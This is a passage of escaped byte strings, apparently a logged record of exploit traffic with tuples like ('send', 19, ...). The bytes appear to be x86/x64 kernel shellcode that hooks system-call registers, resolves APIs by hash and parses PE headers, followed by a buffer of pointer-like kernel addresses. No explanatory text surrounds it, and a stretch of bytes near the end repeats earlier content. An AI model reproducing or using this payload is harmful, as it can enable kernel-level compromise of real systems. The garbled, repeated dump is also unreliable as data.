0\\\\xc2I\\\\xeb\\\\xf0\\\\x89\\\\xd0^Z\\\\xc2\\\\x08\\\\x00XZ_^PV\\\\x89\\\\xf0\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc61\\\\xc0\\\\x89\\\\xc1f\\\\x8bN\\\\x06f\\\\x8bF\\\\x14\\\\x01\\\\xc6\\\\x83\\\\xc6\\\\x18\\\\x85\\\\xc9t\\\\x1d\\\\x8b\\\\x069\\\\xf8u\\\\x07\\\\x8bF\\\\x049\\\\xd0t\\\\x06\\\\x83\\\\xc6(I\\\\xeb\\\\xe9\\\\x8bF\\\\x0c\\\\x8bN\\\\x08^\\\\x01\\\\xc6\\\\xc31\\\\xf6\\\\xc3`1\\\\xc0\\\\x83\\\\xf8\\\\x0ft\\\\x1e1\\\\xc9\\\\x8b<\\\\x86\\\\x8b\\\\x14\\\\x8e9\\\\xd7t\\\\x03Au\\\\xf3\\\\x0f\\\\xb6\\\\x94\\\\x03\\\\x87\\\\x03\\\\x00\\\\x009\\\\xd1u\\\\r@\\\\xeb\\\\xddA9\\\\xc8u\\\\x05a1\\\\xc0@\\\\xc3a1\\\\xc0\\\\xc3\\\\x00\\\\x01\\\\x02\\\\x03\\\\x04\\\\x05\\\\x06\\\\x07\\\\x08\\\\t\\\\n\\\\t\\\\t\\\\r\\\\x0e\\\\x8bL$\\\\x08`\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00]f\\\\x81\\\\xe5\\\\x00\\\\xf0\\\\x89M4\\\\xe8\\\\xd9\\\\x01\\\\x00\\\\x00\\\\xe8C\\\\x01\\\\x00\\\\x00\\\\xe8\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xe3\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bK\\\\xd8\\\\xe8\\\\x17\\\\x01\\\\
x00\\\\x00<#t\\\\r<wt\\\\x1c<\\\\xc8t\"\\\\xe9\\\\xb6\\\\x00\\\\x00\\\\x00\\\\x8bM8\\\\x8bE$\\\\x89A\\\\x0e1\\\\xc0\\\\x88A\\\\x12\\\\xe9\\\\x9f\\\\x00\\\\x00\\\\x00\\\\xe8\\\\x13\\\\x01\\\\x00\\\\x00\\\\xe9\\\\xb5\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bC\\\\xe8\\\\x8b03u(\\\\x8bx\\\\x083}(\\\\x8b@\\\\x043E(;C\\\\x10\\\\x89\\\\xc3u{\\\\x8bM09\\\\xf1\\\\x8bE,t\\\\x18\\\\xe8\\\\xf2\\\\x00\\\\x00\\\\x00\\\\x8dF\\\\x04Pj\\\\x00\\\\xffU\\\\x08\\\\x85\\\\xc0tc\\\\x89E,\\\\x89u0\\\\x01\\\\xdf9\\\\xf7wS)\\\\xdf\\\\x01\\\\xc7W\\\\x89\\\\xf2\\\\x8bu<\\\\x8bv\\\\xf0\\\\x89\\\\xd9\\\\xf3\\\\xa4^\\\\x89\\\\xd9\\\\xc1\\\\xe9\\\\x02\\\\x8b](1\\\\x1e\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf9\\\\x01\\\\xd09\\\\xc6|(\\\\x8bE,`\\\\x89\\\\xe6P\\\\xff\\\\xd0\\\\x89\\\\xf4a\\\\xe8\\\\xa1\\\\x00\\\\x00\\\\x00\\\\x8bE$\\\\xd1\\\\xe81\\\\xc9\\\\x88\\\\xc1\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89E$\\\\xe8h\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00\\\\x8bM8\\\\xb4\\\\x00f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1ca\\\\xff`<\\\\x8dEH\\\\x8bM\\\\x0c\\\\x89\\\\x88G\\\\x01\\\\x00\\\\x00\\\\x89\\\\xa8>\\\\x01\\\\x00\\\\x00f\\\\xb8\\\\x10\\\\x00\\\\x8bM8f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1cah\\\\x00\\\\x00\\\\x00\\\\x00\\\\x8b@<Ph\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc31\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bE$\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89E(Y\\\\xc3`\\\\xe8\\\\x0b\\\\x00\\\\x00\\\\x00\\\\x8bE\\\\x10\\\\x8bH<\\\\x89H8a\\\\xc3`\\\\x8b],\\\\x85\\\\xdbt\\\\r1\\\\xc0\\\\x89\\\\xdf\\\\x8bM0\\\\xf3\\\\xaaS\\\\xffU\\\\x0c1\\\\xc0\\\\x89E0\\\\x89E,a\\\\xc3WRV\\\\x89\\\\xcf\\\\x8bUD\\\\x8b\\\\n\\\\xe89\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0u\\\\x0e\\\\x83\\\\xc2\\\\x08\\\\x8b\\\\n\\\\xe8+\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t!\\\\x89MDj\\\\x0cX\\\\x8dqT;\\\\x06t\\\\x07\\\\x83\\\\xc6\\\\x04;\\\\x06u\\\\r;F\\\\x04u\\\\x08\\\\x89u<1\\\\xc0@\
\\\xeb\\\\x021\\\\xc0^Z_\\\\xc31\\\\xc09\\\\xc1}\\\\x01@\\\\xc3RQ1\\\\xd2f\\\\x8bQ\\\\x02\\\\x01\\\\xca;\\\\x11t\\\\x05\\\\x83\\\\xc1\\\\x04\\\\xeb\\\\xf7Z\\\\x8dA\\\\x1c\\\\x83\\\\xc0\\\\x07$\\\\xf8\\\\x89ED\\\\x8bA\\\\xf8\\\\x89E8\\\\x89\\\\xd1Z\\\\xc3SUWVATAUAVAWH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x80\\\\x00\\\\x00\\\\x00f\\\\x83\\\\xe4\\\\xf0\\\\xe8\\\\x83\\\\x03\\\\x00\\\\x00H\\\\x89E\\\\xf8H\\\\x89\\\\xc3\\\\xb9.[Q\\\\xd2\\\\xe8\\\\xee\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xd5\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc6\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8\\\\xd8\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xbf\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xf0H\\\\x89\\\\xc7\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe8\\\\xbe\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xa5\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xe8L\\\\x8dM\\\\xd0M1\\\\xc0L\\\\x89\\\\xc1D\\\\x89E\\\\xd0L\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6D\\\\x8bE\\\\xd0E\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0H1\\\\xc9\\\\xff\\\\xd7H\\\\x85\\\\xc0\\\\x0f\\\\x84n\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc3H1\\\\xc9I\\\\x89\\\\xc9D\\\\x8bE\\\\xd0H\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6H\\\\x85\\\\xc0\\\\x0f\\\\x85Q\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xd8H-\\\\xf8\\\\x00\\\\x00\\\\x00H\\\\x05(\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0\\\\x81\\\\xea(\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c3\\\\x01\\\\x00\\\\x00\\\\x89U\\\\xd0P\\\\xe8?\\\\x02\\\\x00\\\\x00H\\\\x89\\\\xc2X\\\\xb9\\\\xfa<\\\\xad\\\\xc2H9\\\\xcat\\\\n\\\\xb9\\\\x1a\\\\xbdK+H9\\\\xcau\\\\xcaH\\\\x8bp\\\\xe8H\\\\x89\\\\xd9\\\\xffU\\\\xe8H\\\\x89\\\\xf0H1\\\\xd2H\\\\x89\\\\xc3\\\\x8bP<H\\\\x01\\\\xd0H\\\\x89\\\\xc6H1\\\\xc9H\\\\x89\\\\xcaf\\\\x8bH\\\\x06f\\\\x8bP\\\\x14H\\\\x01\\\\xd6H\\\\x83\\\\xc6\\\\x18H\\\\xbf.data\\\\x00\\\\x00\\\\x00H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x84\\\\xcd\\\\x00\\\\x00\\\\x00H\\\\x8b\\\\x06H9\\\\xf8t\\\\tH\\\\x83\\\\xc6(H\\\\xff\\\\xc9\\\\xeb\\\\xe5\\\\x8bF\\\\x0c\\\\x8bN\\\\x08H\\\\x01\\\\xc6H\\\\xbb\\\\xfe\\\\xfe\
\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfeH\\\\x83\\\\xe9\\\\x08H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x8c\\\\x9b\\\\x00\\\\x00\\\\x00H\\\\x8b>H9\\\\xdfu\\\\x0cL\\\\x8b\\\\x86\\\\x98\\\\x00\\\\x00\\\\x00M\\\\x85\\\\xc0t\\\\x06H\\\\x83\\\\xc6\\\\x08\\\\xeb\\\\xd8H\\\\x83\\\\xc6\\\\x08H\\\\x89u\\\\xe0H1\\\\xc9\\\\xba\\\\xf0\\\\x0f\\\\x00\\\\x00\\\\xffU\\\\xf0H\\\\x85\\\\xc0tiI\\\\x89\\\\xc1H1\\\\xc0\\\\xb9\\\\x00\\\\x04\\\\x00\\\\x00L\\\\x89\\\\xcf\\\\xf3\\\\xabL\\\\x89\\\\xcfH\\\\x83\\\\xc7`H\\\\x8d5\\\\x91\\\\x02\\\\x00\\\\x00H1\\\\xc9f\\\\xb96\\\\x02\\\\xf3\\\\xa4M\\\\x89\\\\tH\\\\x8b]\\\\xf8I\\\\x89Y\\\\x08H1\\\\xdfH\\\\x8b]\\\\xf0I\\\\x89Y\\\\x10H1\\\\xdfH\\\\x8b]\\\\xe8I\\\\x89Y\\\\x18H1\\\\xdfH\\\\x8b]\\\\xe0I\\\\x89Y H1\\\\xdfA\\\\x89yDH\\\\x8bE\\\\xe0H\\\\x83\\\\xc0pI\\\\x83\\\\xc1`L\\\\x89\\\\x08H\\', 0.0)', '(\\'send\\', 19, b\\'\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\
\\xff\\\\xff\\\\xff\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x90\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00
\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\x01\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x02\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x001\\\\xc0@\\\\x90t\\\\x08\\\\xe8\\\\t\\\\x00\\\\x00\\\\x00\\\\xc2$\\\\x00\\\\xe8\\\\xa7\\\\x00\\\\x00\\\\x00\\\\xc3\\\\xe8\\\\x01\\\\x00\\\\x00\\\\x00\\\\xeb\\\\x90[\\\\xb9v\\\\x01\\\\x00\\\\x00\\\\x0f2\\\\xa3\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\x8dC\\\\x171\\\\xd2\\\\x0f0\\\\xc3\\\\xb9#\\\\x00\\\\x00\\\\x00j0\\\\x0f\\\\xa1\\\\x8e\\\\xd9\\\\x8e\\\\xc1d\\\\x8b\\\\r@\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\xff5\\\\xfc\\\\xff\\\\xdf\\\\xff`\\\\x9cj#R\\\\x9cj\\\\x02\\\\x83\\\\xc2\\\\x08\\\\x9d\\\\x80L$\\\\x01\\\\x02j\\\\x1b\\\\xff5\\\\x04\\\\x03\\\\xdf\\\\xffj\\\\x00USVWd\\\\x8b\\\\x1d\\\\x1c\\\\x00\\\\x00\\\\x00j;\\\\x8b\\\\xb3$\\\\x01\\\\x00\\\\x00\\\\xff31\\\\xc0H\\\\x89\\\\x03\\\\x8bn(j\\\\x01\\\\x83\\\\xecH\\\\x81\\\\xed\\\\x9c\\\\x02\\\\x00\\\\x00\\\\xa1\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\xb9v\\\\x01\\\\x00\\\\x001\\\\xd2\\\\x0f0\\\\xfb\\\\xe8\\\\x11\\\\x00\\\\x00\\\\x00\\\\xfad\\\\x8b\\\\r@\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\x83\\\\xec(\\\\x9da\\\\xc3\\\\xe9\\\\xef\\\\x00\\\\x00\\\\x00\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f2H\\\\xbb\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x89S\\\\x04\\\\x89\\\\x03H\\\\x8d\\\\x05\\\\n\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xc2H\\\\xc1\\\\xea 
\\\\x0f0\\\\xc3\\\\x0f\\\\x01\\\\xf8eH\\\\x89$%\\\\x10\\\\x00\\\\x00\\\\x00eH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00PSQRVWUAPAQARASATAUAVAWj+e\\\\xff4%\\\\x10\\\\x00\\\\x00\\\\x00ASj3QL\\\\x89\\\\xd1H\\\\x83\\\\xec\\\\x08UH\\\\x81\\\\xecX\\\\x01\\\\x00\\\\x00H\\\\x8d\\\\xac$\\\\x80\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x9d\\\\xc0\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xbd\\\\xc8\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xb5\\\\xd0\\\\x00\\\\x00\\\\x00H\\\\xa1\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xc2H\\\\xc1\\\\xea H1\\\\xdb\\\\xff\\\\xcbH!\\\\xd8H1\\\\xc9\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f0\\\\xfb\\\\xe88\\\\x00\\\\x00\\\\x00\\\\xfaeH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00H\\\\x83\\\\xecxA_A^A]A\\\\\\\\A[AZAYAX]_^ZY[XeH\\\\x8b$%\\\\x10\\\\x00\\\\x00\\\\x00\\\\x0f\\\\x01\\\\xf8\\\\xff$%\\\\xf8\\\\x0f\\\\xd0\\\\xff1\\\\xc0@\\\\x90\\\\x0f\\\\x84\\\\xb5\\\\x05\\\\x00\\\\x00\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00X`\\\\x89\\\\xc3\\\\x89\\\\xe5\\\\x83\\\\xecHd\\\\x8b\\\\r8\\\\x00\\\\x00\\\\x00f\\\\x8bA\\\\x06\\\\xc1\\\\xe0\\\\x10f\\\\x8b\\\\x01f%\\\\x00\\\\xf0\\\\x8b\\\\x08f\\\\x81\\\\xf9MZt\\\\x07-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xf0\\\\x89E\\\\xfcS\\\\x89\\\\xc3\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8>\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf8\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe81\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\xb9.[Q\\\\xd2\\\\xe8$\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xec[\\\\x8dU\\\\xe81\\\\xc9\\\\x89\\\\nRj\\\\x00Rj\\\\x0b\\\\xff\\\\xd0\\\\x8bU\\\\xe8\\\\x85\\\\xd2\\\\x0f\\\\x84\\\\x02\\\\x01\\\\x00\\\\x00Rj\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xf4\\\\x00\\\\x00\\\\x00Pj\\\\x00\\\\xffu\\\\xe8Pj\\\\x0b\\\\xffU\\\\xec\\\\x85\\\\xc0\\\\x0f\\\\x85\\\\xe0\\\\x00\\\\x00\\\\x00XP-\\\\xfc\\\\x00\\\\x00\\\\x00\\\\x05\\\\x1c\\\\x01\\\\x00\\\\x00P\\\\xe8\\\\x80\\\\x01\\\\x00\\\\x00\\\\xb9\\\\xfa<\\\\xad\\\\xc29\\\\xc8t\\\\x1e\\\\xb9\\\\x1a\\\\xbdK+9\\\\xc8t\\\\x15X\\\\x8bU\\\\xe8\\\\x81\\\\xea\\\\x1c\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c\\\\xac\\\\x00\\\\x00\\\\
x00\\\\x89U\\\\xe8\\\\xeb\\\\xceX\\\\x8bp\\\\xec\\\\xffU\\\\xf4\\\\x89\\\\xf0PPh.datja\\\\xe8\\\\\\'\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x88\\\\x00\\\\x00\\\\x00X\\\\x83\\\\xe9@\\\\xe8Z\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x15\\\\x8b\\\\x16\\\\xc1\\\\xea\\\\x18\\\\x89\\\\xf0\\\\xc1\\\\xe8\\\\x189\\\\xd0u\\\\x07\\\\x8bFH\\\\x85\\\\xc0t\\\\n\\\\x83\\\\xc6\\\\x04\\\\x83\\\\xe9\\\\x04\\\\xe3^\\\\xeb\\\\xd8\\\\x89u\\\\xf0Vh\\\\xf8\\\\x0f\\\\x00\\\\x00j\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0tJP\\\\x89\\\\xc71\\\\xc0\\\\x89\\\\xc1f\\\\x81\\\\xc1\\\\x00\\\\x04\\\\xf3\\\\xabX\\\\x89\\\\x00\\\\x8bU\\\\x04\\\\x89P\\\\x041\\\\xd7\\\\x8bU\\\\xf8\\\\x89P\\\\x081\\\\xd7\\\\x8bU\\\\xf4\\\\x89P\\\\x0c1\\\\xd7\\\\x8bU\\\\xf0\\\\x89P\\\\x101\\\\xd7\\\\x89x$\\\\x83\\\\xc0H\\\\x89\\\\xc7\\\\x8d\\\\xb3\\\\x96\\\\x03\\\\x00\\\\x00\\\\xb9\\\\x1a\\\\x02\\\\x00\\\\x00\\\\xf3\\\\xa4[\\\\x89C8\\\\x89\\\\xeca\\\\xc3SRQWU\\\\x89\\\\xe5\\\\x83\\\\xec\\\\x18\\\\x89\\\\xcf\\\\x89\\\\xd8\\\\x89E\\\\xfc\\\\xe8z\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0tm\\\\x89E\\\\xf8\\\\xe8\\\\xee\\\\x00\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x0e\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tS\\\\x89E\\\\xf0\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x04\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tA\\\\x89E\\\\xec\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\xfa\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t/\\\\x89E\\\\xe8\\\\x8bE\\\\xfc\\\\x89\\\\xf9\\\\x8bU\\\\xec\\\\x8b]\\\\xf4\\\\xe8\\\\xab\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x18\\\\x89\\\\xc1\\\\x8bE\\\\xe8\\\\xe8\\\\xdd\\\\x00\\\\x00\\\\x00f\\\\x89\\\\xc2\\\\x8bE\\\\xfc\\\\x8bM\\\\xf0\\\\xe8\\\\xd7\\\\x00\\\\x00\\\\x00\\\\x83\\\\xc4\\\\x18]_YZ[\\\\xc3V\\\\x89\\\\xc6\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc6f\\\\x81>PEu\\\\t\\\\x83\\\\xc6x\\\\x8b6\\\\x01\\\\xf0^\\\\xc31\\\\xc0\\\\xeb\\\\xfaVQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x05\\\\x01\\\\xc8F\\\\xeb\\\\xe9_Y^\\\\xc3VWR
\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0F\\\\xe2\\\\xeeZ_^\\\\xc3VQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\xc6\\\\x01\\\\xc8FF\\\\xeb\\\\xe8_Y^\\\\xc3\\\\x83\\\\xc0\\\\x18\\\\x8b\\\\x00\\\\xc3WVQ1\\\\xff\\\\x89\\\\xc69\\\\xdft\\\\x19\\\\x8b\\\\x04\\\\xba\\\\x01\\\\xf0\\\\xe8\\\\x83\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x07G\\\\xeb\\\\xebY^_\\\\xc3\\\\x89\\\\xf8\\\\xeb\\\\xf81\\\\xc0\\\\xeb\\\\xf4\\\\x83\\\\xc1\\\\x1c\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1 \\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1$\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\xd1\\\\xe1\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3\\\\x81\\\\xe2\\\\xff\\\\xff\\\\x00\\\\x00\\\\xc1\\\\xe2\\\\x02\\\\x01\\\\xd1\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3RV\\\\x8bt$\\\\x0c\\\\x8bL$\\\\x101\\\\xd2\\\\xd1\\\\xe9\\\\x85\\\\xc9t\\\\x0c\\\\xc1\\\\xc2\\\\x05\\\\xacF\\\\x0c 0\\\\xc2I\\\\xeb\\\\xf0\\\\x89\\\\xd0^Z\\\\xc2\\\\x08\\\\x00XZ_^PV\\\\x89\\\\xf0\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc61\\\\xc0\\\\x89\\\\xc1f\\\\x8bN\\\\x06f\\\\x8bF\\\\x14\\\\x01\\\\xc6\\\\x83\\\\xc6\\\\x18\\\\x85\\\\xc9t\\\\x1d\\\\x8b\\\\x069\\\\xf8u\\\\x07\\\\x8bF\\\\x049\\\\xd0t\\\\x06\\\\x83\\\\xc6(I\\\\xeb\\\\xe9\\\\x8bF\\\\x0c\\\\x8bN\\\\x08^\\\\x01\\\\xc6\\\\xc31\\\\xf6\\\\xc3`1\\\\xc0\\\\x83\\\\xf8\\\\x0ft\\\\x1e1\\\\xc9\\\\x8b<\\\\x86\\\\x8b\\\\x14\\\\x8e9\\\\xd7t\\\\x03Au\\\\xf3\\\\x0f\\\\xb6\\\\x94\\\\x03\\\\x87\\\\x03\\\\x00\\\\x009\\\\xd1u\\\\r@\\\\xeb\\\\xddA9\\\\xc8u\\\\x05a1\\\\xc0@\\\\xc3a1\\\\xc0\\\\xc3\\\\x00\\\\x01\\\\x02\\\\x03\\\\x04\\\\x05\\\\x06\\\\x07\\\\x08\\\\t\\\\n\\\\t\\\\t\\\\r\\\\x0e\\\\x8bL$\\\\x08`\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00]f\\\\x81\\\\xe5\\\\x00\\\\xf0\\\\x89M4\\\\xe8\\\\xd9\\\\x01\\\\x00\\\\x00\